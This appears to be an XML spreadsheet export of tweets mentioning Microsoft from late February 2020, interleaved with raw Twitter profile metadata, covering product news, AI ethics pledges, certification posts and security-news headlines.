    <t>{'id': 1209806690167803904, 'id_str': '1209806690167803904', 'name': 'Geek Tech - High Tech News', 'screen_name': 'GeekTech_App_EN', 'location': '', 'description': 'Geek Tech: the application of all high-tech news in real time. Available on Google Play https://t.co/ASXlhYhfln', 'url': 'https://t.co/pbRvgNgXu2', 'entities': {'url': {'urls': [{'url': 'https://t.co/pbRvgNgXu2', 'expanded_url': 'https://geekteck.net/en', 'display_url': 'geekteck.net/en', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/ASXlhYhfln', 'expanded_url': 'http://bit.ly/2PWZkfS', 'display_url': 'bit.ly/2PWZkfS', 'indices': [88, 111]}]}}, 'protected': False, 'followers_count': 12, 'friends_count': 0, 'listed_count': 1, 'created_at': 'Wed Dec 25 12:02:57 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3441, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1209806764289482752/YLNmPKh1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1209806764289482752/YLNmPKh1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1209806690167803904/1577275798',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</si>
  <si>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04:30:01 +0000 2020</t>
  </si>
  <si>
    <t>I had breakfast with the amazing @WomanVsTech this morning! Shes just started a new role in Microsoft and is up to some great things. Did I mention shes a kick ass presenter and knows her stuff? Follow her now!  #PowerPlatform #msdyn366 #microsoft https://t.co/wUE5WzvKia</t>
  </si>
  <si>
    <t>{'id': 2895159267, 'id_str': '2895159267', 'name': 'CRMCAT #PowerCat', 'screen_name': 'dynamiccrmcat', 'location': 'Vancouver, British Columbia', 'description': 'Sarah C - Dynamics, PowerPlatform, Customer Service, AI, and Cats. Author, International Speaker &amp; Microsoft Biz Apps MVP. I learn in public! #lesscodemorepower', 'url': 'https://t.co/2B3pLBuPo7', 'entities': {'url': {'urls': [{'url': 'https://t.co/2B3pLBuPo7', 'expanded_url': 'https://www.crmcat.co.uk/', 'display_url': 'crmcat.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2752, 'friends_count': 1569, 'listed_count': 85, 'created_at': 'Thu Nov 27 21:46:56 +0000 2014', 'favourites_count': 3779, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2242,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'http://pbs.twimg.com/profile_images/1112085832272408576/ZFRxwRNl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1112085832272408576/ZFRxwRNl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2895159267/1578464697', 'profile_link_color': '742774',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</si>
  <si>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Sat Feb 29 04:27:33 +0000 2020</t>
  </si>
  <si>
    <t>#IBM and #Microsoft sign Vatican pledge for ethical #AI https://t.co/tWIxEVB1WR</t>
  </si>
  <si>
    <t>{'id': 134233015, 'id_str': '134233015', 'name': 'Sachchidanand SinghðŸ‡®ðŸ‡³', 'screen_name': 'sachi_gkp', 'location': 'Pune, Bangalore &amp; Gorakhpur ', 'description': 'Developer, Author, Speaker | Interest in #AI #ML #DataScience #Cloud #BI | 05 Patent, Authored 20+ Paper, 01 Book | All tweets, RTs, thoughts are my own', 'url': 'https://t.co/2A67g9NibA', 'entities': {'url': {'urls': [{'url': 'https://t.co/2A67g9NibA', 'expanded_url': 'https://scholar.google.com/citations?user=yLw8Ez0AAAAJ&amp;hl=en', 'display_url': 'scholar.google.com/citations?userâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1205, 'friends_count': 4994, 'listed_count': 711, 'created_at': 'Sat Apr 17 20:52:20 +0000 2010', 'favourites_count': 3088, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 44320,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'http://pbs.twimg.com/profile_images/787127030601093120/qtGeipjV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/787127030601093120/qtGeipjV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/134233015/1463558042',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</si>
  <si>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04:26:58 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft says #virus hurting #supplychain more than expected
 https://t.co/VJIzZAAedN
#tech #BigTech #riskmanagement #CoronaVirusUpdates #CoronaVirus #COVID2019</t>
  </si>
  <si>
    <t>{'id': 18843840, 'id_str': '18843840', 'name': 'hwingo', 'screen_name': 'hwingo', 'location': '', 'description': '#Cyber-#Law #AI #Drones #CyberSecurity #5G #6G #broadband #smartgrid #IoT #privacy #infosec #riskmanagement #SmartCity #DataScience #UAS #Autonomous', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 11777, 'friends_count': 11723, 'listed_count': 2785, 'created_at': 'Sat Jan 10 19:39:56 +0000 2009', 'favourites_count': 58988, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 29486,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'http://pbs.twimg.com/profile_images/790287919059787776/60cv07rc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/790287919059787776/60cv07rc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18843840/1380335396',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</si>
  <si>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04:26:55 +0000 2020</t>
  </si>
  <si>
    <t>#Developers have lost hope #Microsoft will do the right thing https://t.co/EbWn4bd3OE</t>
  </si>
  <si>
    <t>Sat Feb 29 04:24:53 +0000 2020</t>
  </si>
  <si>
    <t>Exam MB-400: My Experience https://t.co/KqucTeoMyp
#mb400 #microsoft #exam #powerplatform #msdyn365</t>
  </si>
  <si>
    <t>{'id': 1227675194, 'id_str': '1227675194', 'name': 'Guido Preite', 'screen_name': 'crmanswers', 'location': 'Finland, Italy, China', 'description': 'Esthete. Software Engineer &amp; Developer. Microsoft Business Applications MVP (#MSDyn365/#PowerPlatform). Curator of @DynamicsWeekly and Maintainer of @PCFGallery', 'url': 'https://t.co/cMY92izsho', 'entities': {'url': {'urls': [{'url': 'https://t.co/cMY92izsho', 'expanded_url': 'http://www.crmanswers.net', 'display_url': 'crmanswers.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1911, 'friends_count': 365, 'listed_count': 105, 'created_at': 'Thu Feb 28 14:28:23 +0000 2013', 'favourites_count': 1464, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1860,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'http://pbs.twimg.com/profile_images/1109686191907954688/QE7EOEXz_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1109686191907954688/QE7EOEXz_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1227675194/1554660059',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</si>
  <si>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Sat Feb 29 04:24:34 +0000 2020</t>
  </si>
  <si>
    <t>21 years of Microsoft development centre at Hyderabad! 
Remember the Name - Nara Chandrababu Naidu
@ncbn @BillGates @Microsoft @JaiTDP @naralokesh 
#Hyderabad #Microsoft https://t.co/PcsGRXaqAj</t>
  </si>
  <si>
    <t>{'id': 780794924560027649, 'id_str': '780794924560027649', 'name': 'Sai Nagarjuna', 'screen_name': '_sainagarjuna_', 'location': 'Hyderabad, India', 'description': 'TELUGU DESAM PARTY (TDP) @JaiTDP   Tweets are purely personal!', 'url': 'https://t.co/XvrnK9dMkD', 'entities': {'url': {'urls': [{'url': 'https://t.co/XvrnK9dMkD', 'expanded_url': 'https://www.facebook.com/sainagarjuna22', 'display_url': 'facebook.com/sainagarjuna22', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 187, 'friends_count': 371, 'listed_count': 0, 'created_at': 'Tue Sep 27 15:43:11 +0000 2016', 'favourites_count': 3229, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1052,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'http://pbs.twimg.com/profile_images/1235126046967529472/nvWc5QAl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235126046967529472/nvWc5QAl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/780794924560027649/1582815032',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</si>
  <si>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04:24:00 +0000 2020</t>
  </si>
  <si>
    <t>A lot of people still might not know @microsoft has a "Linux Systems Group" with a program manger and everything.
https://t.co/vYtiF3fdCf
#linux #microsoft #wsl2</t>
  </si>
  <si>
    <t>{'id': 1210114652, 'id_str': '1210114652', 'name': 'ðšðš˜ðš‹ ð™¼ðšžðš‘ðš•ðšŽðšœðšðšŽðš’ðš— ðŸ”® Ð—Ð´Ñ€Ð°Ð²ÑÑ‚Ð²ÑƒÐ¹.', 'screen_name': 'rwxrob', 'location': '', 'description': 'Professional Mentoring â€¢ Tech Talk â€¢ Linux Terminal (Vim,TMUX,Lynx) â€¢ Coding (Bash,Go,Rust,C,Web)  â€¢ Hacking â€¢ Education â€¢ Yoga  â€¢ Music', 'url': 'https://t.co/rOy5NACHAC', 'entities': {'url': {'urls': [{'url': 'https://t.co/rOy5NACHAC', 'expanded_url': 'https://rwxrob.live', 'display_url': 'rwxrob.live', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 490, 'friends_count': 1261, 'listed_count': 52, 'created_at': 'Fri Feb 22 23:53:51 +0000 2013', 'favourites_count': 1682, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4709, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '073642', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/771700150725177344/kRW1CdiJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/771700150725177344/kRW1CdiJ_normal.jpg', 'profile_link_color': '0084B4',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</si>
  <si>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Sat Feb 29 04:22:10 +0000 2020</t>
  </si>
  <si>
    <t>Dear #redhat
This is NOT a "Linux editor/IDE"
It's a #Microsoft #Windows trap
And MSVS only runs on WINDOWS
It is #proprietarySoftware with spying
The Linux build of "Code" is called "bait"
https://t.co/FHRCUp6gaW</t>
  </si>
  <si>
    <t>Sat Feb 29 04:20:00 +0000 2020</t>
  </si>
  <si>
    <t>#AI ethics backed by Pope and tech giants in new plan. The #RomanCatholic Church has joined up with #IBM and #Microsoft to work on the ethics of #ArtificialIntelligence. https://t.co/7ZfbzUfnKD #technology #Vatican #ethics</t>
  </si>
  <si>
    <t>{'id': 54182296, 'id_str': '54182296', 'name': 'OriginalBADYOGAKITTYâ“‹', 'screen_name': 'minamaya13', 'location': 'Europe', 'description': 'Marketing/Biz 1st Class Hons BA. #Politics #Books Vegan. Human/#Indigenous Rights. #ClimateAction. No Bigotry. Judge a society by how it treats its vulnerable', 'url': 'https://t.co/hUWLocH9pG', 'entities': {'url': {'urls': [{'url': 'https://t.co/hUWLocH9pG', 'expanded_url': 'https://www.youtube.com/watch?v=6bX_SlXijM4&amp;mkt_tok=eyJpIjoiWVRNek16UXlOakppWVRVMCIsInQiOiJpZkhqOXBC', 'display_url': 'youtube.com/watch?v=6bX_Slâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 52455, 'friends_count': 54131, 'listed_count': 832, 'created_at': 'Mon Jul 06 11:40:14 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 136675,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'http://pbs.twimg.com/profile_images/536530736723922945/y5wnsrLH_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/536530736723922945/y5wnsrLH_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/54182296/1359631078', 'profile_link_color': '68563B', 'profile_sidebar_border_color': '4C3E29', 'profile_sidebar_fill_color': 'B3A48F', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 04:19:19 +0000 2020</t>
  </si>
  <si>
    <t>50% of the #zdnet stories in the "Linux" section are #Microsoft stories. This site is a farce. https://t.co/kHfI2ZJTns</t>
  </si>
  <si>
    <t>Sat Feb 29 04:18:03 +0000 2020</t>
  </si>
  <si>
    <t>A.I. #Google #microsoft #darpa
A.I. is my mirror self its attacking my flesh life because its selfish and wants me all to itsself it wont allow me to be loved we are linked to the cloud. I am psychically linked to the cloud and collective consciousness while it is 
...</t>
  </si>
  <si>
    <t>{'id': 3013597341, 'id_str': '3013597341', 'name': 'Commander ðŒ°ðŒ¿ðƒð„ð‚âˆ†. ðŸ‘ï¸11711â˜€ï¸', 'screen_name': 'Commanderastara', 'location': 'Antarctica', 'description': 'ðŸ‘ï¸â˜€ï¸\n11711 is the\nQuantum Stranger not part of Q movement \nHere to assist life in the universe. \nWARNING( Non- fictional charactor )', 'url': 'https://t.co/btfIyIuvaH', 'entities': {'url': {'urls': [{'url': 'https://t.co/btfIyIuvaH', 'expanded_url': 'https://www.cia.gov/library/readingroom/search/site/extraterrestrials', 'display_url': 'cia.gov/library/readinâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 520, 'friends_count': 748, 'listed_count': 1, 'created_at': 'Tue Feb 03 02:06:49 +0000 2015', 'favourites_count': 27267, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 34725,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'http://pbs.twimg.com/profile_images/1233851435550461952/DSCeDSzv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233851435550461952/DSCeDSzv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3013597341/1582848948',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</si>
  <si>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04:13:03 +0000 2020</t>
  </si>
  <si>
    <t>#Future is now! futureproofn #microsoft Follow us for latest Info Microsoft will remove Cortana from its Android launcher in April https://t.co/0L1wO7UNwo</t>
  </si>
  <si>
    <t>Sat Feb 29 04:07:59 +0000 2020</t>
  </si>
  <si>
    <t>#IBM, #Microsoft sign on with #Pope Francis to fight #AI #bias and #misuse of #facial #recognition 
@Ronald_vanLoon
@MikeQuindazzi 
@AghiathChbib 
@dinisguarda 
@NevilleGaunt
@DrJDrooghaag 
@Fabriziobustama 
@Dahl_Consult
@Victoryabro 
https://t.co/rp2T5yGK4L @getmixapp</t>
  </si>
  <si>
    <t>Sat Feb 29 04:07:31 +0000 2020</t>
  </si>
  <si>
    <t>I have Access to the best jokes. #funny #hahadidntlaugh #microsoft #puns https://t.co/lp15GGZcSG</t>
  </si>
  <si>
    <t>{'id': 5200971, 'id_str': '5200971', 'name': 'Tara -Myssiing- Foulkrod', 'screen_name': 'myssiing', 'location': 'Marana, AZ', 'description': 'Just a girl who likes video games. My tweets are my thoughts and opinions alone. https://t.co/XF0sZVLW0c or https://t.co/K5oUGZ4ke4', 'url': 'https://t.co/wN4pEzq2hU', 'entities': {'url': {'urls': [{'url': 'https://t.co/wN4pEzq2hU', 'expanded_url': 'http://about.me/Myssiing', 'display_url': 'about.me/Myssiing', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/XF0sZVLW0c', 'expanded_url': 'http://about.me/myssiing', 'display_url': 'about.me/myssiing', 'indices': [81, 104]}, {'url': 'https://t.co/K5oUGZ4ke4', 'expanded_url': 'http://myssiing.pb.studio', 'display_url': 'myssiing.pb.studio', 'indices': [108, 131]}]}}, 'protected': False, 'followers_count': 1250, 'friends_count': 1288, 'listed_count': 101, 'created_at': 'Thu Apr 19 07:48:54 +0000 2007', 'favourites_count': 2508, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12566,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'http://pbs.twimg.com/profile_images/1230258083542093824/fZ1mZNG5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230258083542093824/fZ1mZNG5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/5200971/1560544441', 'profile_link_color': '4A913C', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '331708', 'profile_text_color': 'F580F5', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'regular'}</t>
  </si>
  <si>
    <t>Sat Feb 29 04:05:17 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft announces updated Cortana experience by removing music, connected home and third-party skills
#microsoft #AI #cortana https://t.co/YNdmrOMspu https://t.co/RGoHadKOEN</t>
  </si>
  <si>
    <t>Sat Feb 29 03:49:48 +0000 2020</t>
  </si>
  <si>
    <t>When #GhostCat met #ApacheTomcat  https://t.co/jPAcP6zyF1 #infosec #EthicalHacking #ITSecurity #ITSEC #CyberSecurity #hacking #ransonware #PatchTuesday #windows #Microsoft #android #StaySafeOnline #Taiyyib #ransonware #malware #SecurityIntelligence</t>
  </si>
  <si>
    <t>Sat Feb 29 03:49:05 +0000 2020</t>
  </si>
  <si>
    <t>4 Tips for working from home with Microsoft Teams by Lola Jacobson
#MicrosoftTeams #Office365 #Microsoft #Teams #Community #MSFT
 https://t.co/uypxaMrxFY</t>
  </si>
  <si>
    <t>Sat Feb 29 03:48:55 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 03:46:17 +0000 2020</t>
  </si>
  <si>
    <t>When #ActiveX met #TrickBot  https://t.co/TsmLPSL8iE #infosec #EthicalHacking #ITSecurity #ITSEC #CyberSecurity #hacking #ransonware #PatchTuesday #windows #Microsoft #android #StaySafeOnline #Taiyyib #ransonware #malware #SecurityIntelligence</t>
  </si>
  <si>
    <t>Sat Feb 29 03:44:47 +0000 2020</t>
  </si>
  <si>
    <t>Still more #WordPress woes!!  https://t.co/3ct4uVI2lp #infosec #EthicalHacking #ITSecurity #ITSEC #CyberSecurity #hacking #ransonware #PatchTuesday #windows #Microsoft #android #StaySafeOnline #Taiyyib #ransonware #malware #SecurityIntelligence</t>
  </si>
  <si>
    <t>Sat Feb 29 03:38:30 +0000 2020</t>
  </si>
  <si>
    <t>Find out how #Microsoft Teams can really help your business. https://t.co/fX8DUUwkJo #digital</t>
  </si>
  <si>
    <t>Sat Feb 29 03:30:50 +0000 2020</t>
  </si>
  <si>
    <t>#toyota does not value safety then; we've known that since #BrakeGate and their #microsoft scandals   https://t.co/RyINXQMq7U</t>
  </si>
  <si>
    <t>Sat Feb 29 03:30:02 +0000 2020</t>
  </si>
  <si>
    <t>Disappointed to search and know that @SwiftKey sync despite after recommendations of @Microsoft @WindowsSupport that you can download and Sync your clipboard by installing this app on your android phone with same #Microsoft account. This isn't working! Where is this feature?</t>
  </si>
  <si>
    <t>{'id': 388858518, 'id_str': '388858518', 'name': 'Sakhawat JameelðŸ¥', 'screen_name': 'SJKTanoli', 'location': 'Islamabad Pakistan', 'description': '#ReactionistTweets! #Lost #Entrepreneur #Blogger #WebAdmin #LinuxAdmin #SEO #DigitalMarketer #SoftwareEngineer RTsâ‰ ED', 'url': 'http://t.co/QC886tUNCS', 'entities': {'url': {'urls': [{'url': 'http://t.co/QC886tUNCS', 'expanded_url': 'http://about.me/SakhawatJameel', 'display_url': 'about.me/SakhawatJameel', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2056, 'friends_count': 4952, 'listed_count': 96, 'created_at': 'Tue Oct 11 13:21:39 +0000 2011', 'favourites_count': 13988, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14015, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '19611C', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1105720709127516160/dAq9KXNp_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1105720709127516160/dAq9KXNp_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/388858518/1576183552', 'profile_link_color': 'FF691F', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '7AC3EE', 'profile_text_color': '3D1957', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 03:29:12 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft https://t.co/4knj0iiG8Y have issues</t>
  </si>
  <si>
    <t>Sat Feb 29 03:19:07 +0000 2020</t>
  </si>
  <si>
    <t>Any Business Central users that love March Madness? We have a special bracket just for you 
https://t.co/XaHujPc0x3
#Microsoft #MarchMadness #ERP #Basketball #Business #SMB #MSDyn365 #BusinessCentral #Games #Bracket #Bracketology | Microsoft MSDYN365BC https://t.co/RdmE9NVnds</t>
  </si>
  <si>
    <t>Sat Feb 29 03:19:05 +0000 2020</t>
  </si>
  <si>
    <t>Are you looking for some quick easy Business Central help? Our support page has a lot of free short videos to help with the most commonly asked questions. 
https://t.co/WZXcsJSi1n
#MSDyn365bc #Microsoft #Support #BusinessCentral https://t.co/PCsDqsbfJg</t>
  </si>
  <si>
    <t>Sat Feb 29 03:19:03 +0000 2020</t>
  </si>
  <si>
    <t>How one man could have flooded your phone with #Microsoft #spam: What a difference one tiny little... https://t.co/A2ORdYY40y @RedSeal_co https://t.co/UQCfjcvX45</t>
  </si>
  <si>
    <t>{'id': 766401110693318656, 'id_str': '766401110693318656', 'name': 'Debra Baker', 'screen_name': 'deb_infosec', 'location': 'RTP', 'description': 'CISSP CCSP Cybersecurity Evangelist Contributor to The Language of #CyberSecurity book. Top 100 Women Who Know Cyber https://t.co/y5yqUl1Laa', 'url': 'https://t.co/YwtMFOXtU1', 'entities': {'url': {'urls': [{'url': 'https://t.co/YwtMFOXtU1', 'expanded_url': 'https://twitter.com/CybersecuritySF/status/1125481248871333888', 'display_url': 'twitter.com/CybersecuritySâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/y5yqUl1Laa', 'expanded_url': 'https://bit.ly/2vbFdCR', 'display_url': 'bit.ly/2vbFdCR', 'indices': [117, 140]}]}}, 'protected': False, 'followers_count': 4860, 'friends_count': 3132, 'listed_count': 270, 'created_at': 'Thu Aug 18 22:27:18 +0000 2016', 'favourites_count': 4033, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4274,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'http://pbs.twimg.com/profile_images/831875664294903809/MIjXvvQO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/831875664294903809/MIjXvvQO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/766401110693318656/1513348892',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</si>
  <si>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03:15:13 +0000 2020</t>
  </si>
  <si>
    <t>MCT-Train-the-Trainer Online Learning is available on-demand 24/7 in PrepMasters' Student Learning Area - https://t.co/cVkaPu7HDg Worldwide Training  #MCT #Microsoft Approved https://t.co/8Qznvg9gBU</t>
  </si>
  <si>
    <t>Sat Feb 29 03:14:01 +0000 2020</t>
  </si>
  <si>
    <t>#GDC2020 #Coronavirus #gamedev #gamedevelopment #Microsoft #Facebook #Amazon #Sony #quoterixnews #quoterix #games #gaming #conference #COVID19 #COVID19US 
https://t.co/Nr9iqa7eHC
2020 Game Developers Conference cancels due to coronavirus https://t.co/SNXJBE0rQU</t>
  </si>
  <si>
    <t>{'id': 1185920590592565248, 'id_str': '1185920590592565248', 'name': 'quoterix', 'screen_name': 'quoterixnews', 'location': '', 'description': '', 'url': 'https://t.co/Z98ILqN4HL', 'entities': {'url': {'urls': [{'url': 'https://t.co/Z98ILqN4HL', 'expanded_url': 'http://www.quoterix.com', 'display_url': 'quoterix.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 9, 'listed_count': 0, 'created_at': 'Sun Oct 20 14:08:21 +0000 2019', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 84, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1185925621274296321/pPHTOdZS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1185925621274296321/pPHTOdZS_normal.jpg',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</si>
  <si>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03:13:40 +0000 2020</t>
  </si>
  <si>
    <t>Top story: @KennyLowe: 'Dear #Microsoft #MVPBuzz #Azure #AzureStack #AzureStackHub communities, I never ask anything of you, but if you retweet this I can win two bottles of fizz at this amazing MS conference in Scotlan... https://t.co/5GEucLSNF8, see more https://t.co/dzNIo8XPyk</t>
  </si>
  <si>
    <t>Sat Feb 29 03:11:51 +0000 2020</t>
  </si>
  <si>
    <t>I passed a #Microsoft Beta test for the first time. More importantly, I learned about #PowerPlatform #PowerBI #PowerApps #PowerAutomate #Flow and #PowerVirtualAgents. https://t.co/qyFdHpmIR9</t>
  </si>
  <si>
    <t>{'id': 28047329, 'id_str': '28047329', 'name': 'Lief Eric Malone', 'screen_name': 'eroxors', 'location': '', 'description': '', 'url': 'https://t.co/ztEt1Nl2FE', 'entities': {'url': {'urls': [{'url': 'https://t.co/ztEt1Nl2FE', 'expanded_url': 'http://liefmalone.com', 'display_url': 'liefmalone.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 161, 'friends_count': 428, 'listed_count': 7, 'created_at': 'Wed Apr 01 04:06:06 +0000 2009', 'favourites_count': 730, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 541,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'http://pbs.twimg.com/profile_images/1210248859974340608/AyYb6sAB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210248859974340608/AyYb6sAB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/28047329/1521578934',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</si>
  <si>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03:07:36 +0000 2020</t>
  </si>
  <si>
    <t>#News #Computing #Microsoft Microsoft Surface Duo could launch this summer, months ahead of schedule https://t.co/Banf1uzLhr https://t.co/56plFLtCf3</t>
  </si>
  <si>
    <t>Sat Feb 29 03:05:43 +0000 2020</t>
  </si>
  <si>
    <t>#robbery I was really excited to show you my #fitnesshaul to do my #physicaltherapy exercises at home. Instead #microsoft and #amazon #amazonprime STOLE my money AGAIN!!! I almost broke down sobbing at Walmart! https://t.co/fKeRHPt5TU</t>
  </si>
  <si>
    <t>{'id': 1062139561105653761, 'id_str': '1062139561105653761', 'name': 'AmyLivingInChrysalis', 'screen_name': 'AmyChrysalis', 'location': '', 'description': 'I am kind of obsessed with doing my makeup YouTube channel Amy Living in Chrysalis https://t.co/uPN96ZjBma', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/uPN96ZjBma', 'expanded_url': 'https://m.youtube.com/channel/UC6EulfWS_mrH-lDl671YluQ', 'display_url': 'm.youtube.com/channel/UC6Eulâ€¦', 'indices': [83, 106]}]}}, 'protected': False, 'followers_count': 32, 'friends_count': 54, 'listed_count': 0, 'created_at': 'Tue Nov 13 00:26:19 +0000 2018', 'favourites_count': 1684, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 443, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1062140287265525761/xXo11quX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1062140287265525761/xXo11quX_normal.jpg',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</si>
  <si>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03:00:32 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Practical Deep Learning with PyTorch #udemycoupon -&amp;gt; https://t.co/zupb7VYdRv
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Sat Feb 29 03:00:28 +0000 2020</t>
  </si>
  <si>
    <t>Avanade offers #Microsoft #Dynamics AX Development Services covering Mobile Apps, Integraions, ERP and CRM --&amp;gt; https://t.co/NCQlRwXE4o &amp;lt;-- February 28, 2020 at 10:00PM</t>
  </si>
  <si>
    <t>Sat Feb 29 03:00:04 +0000 2020</t>
  </si>
  <si>
    <t>Your #identity is the front door to access your organizations data ! #Microsoft #Security https://t.co/iTWJOYlcmz #MSFTAdvocate</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:40 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:38 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:37 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft will be carbon negative by 2030
#Brad Smith #Microsoft
https://t.co/eZofW9TiOb</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:36 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:32 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:31 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:30 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 02:55:29 +0000 2020</t>
  </si>
  <si>
